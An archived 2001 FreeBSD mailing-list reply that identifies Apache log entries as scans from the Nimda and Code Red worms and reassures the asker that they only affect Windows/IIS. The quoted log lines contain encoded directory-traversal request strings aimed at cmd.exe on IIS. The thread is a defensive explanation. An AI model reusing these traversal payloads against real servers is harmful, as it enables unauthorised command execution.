Date: Mon, 19 Nov 2001 22:31:15 +0100 (CET) From: Nils Holland <nils@tisys.org> To: ann kok <annkok2001@yahoo.com> Cc: freebsd-questions@FreeBSD.ORG Subject: Re: apache's log Message-ID: <20011119222958.A4720-100000@jodie.ncptiddische.net> In-Reply-To: <20011119205857.39148.qmail@web20101.mail.yahoo.com>
next in thread | previous in thread | raw e-mail | index | archive | help
What you are seeing in your log comes from the Nimbda / Code Red worms. Luckily, these worms can only do harm to (unprotected) Microsoft Windows / IIS based machines. Assuming that you are running Apache on FreeBSD, you can rest assured: These worms cannot to any harm to you. Greetings Nils On Mon, 19 Nov 2001, ann kok wrote: > Hi all > > I would like to know whether my web server is > comprising by the following log message > > How do I know it? > > Thank you very much > > 203.64.184.144 - - [20/Nov/2001:00:17:18 +0800] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > " 404 304 > 203.64.184.144 - - [20/Nov/2001:00:17:19 +0800] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > " 404 304 > 203.64.184.144 - - [20/Nov/2001:00:17:22 +0800] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > " 404 304 > 203.64.184.144 - - [20/Nov/2001:00:17:26 +0800] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir > HTTP/1. > 0" 400 288 > 203.64.184.144 - - [20/Nov/2001:00:17:33 +0800] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" > 400 288 > 203.64.184.144 - - [20/Nov/2001:00:17:34 +0800] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir > HTTP/ > 1.0" 404 305 > 203.64.184.144 - - [20/Nov/2001:00:17:40 +0800] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" > 404 305 > industry.ssu.ac.kr - - [20/Nov/2001:01:21:34 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:22:58 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:24:29 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:25:59 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:27:30 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:29:00 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:30:30 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:32:01 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:33:31 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:35:02 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:36:32 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:38:03 +0800] > "-" 408 - > > __________________________________________________ > Do You Yahoo!? > Find the one for you at Yahoo! Personals > http://personals.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > > Nils Holland Ti Systems - FreeBSD in Tiddische, Germany http://www.tisys.org * nils@tisys.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011119222958.A4720-100000>